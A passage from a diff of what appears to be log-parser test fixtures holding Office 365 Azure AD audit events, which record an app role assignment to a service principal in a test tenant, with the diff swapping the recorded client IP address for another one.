APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -21399,9 +21399,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:41", "ExtendedProperties": [ { @@ -21635,7 +21635,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -21665,9 +21665,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:45:41", "ExtendedProperties": [ { @@ -21901,7 +21901,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 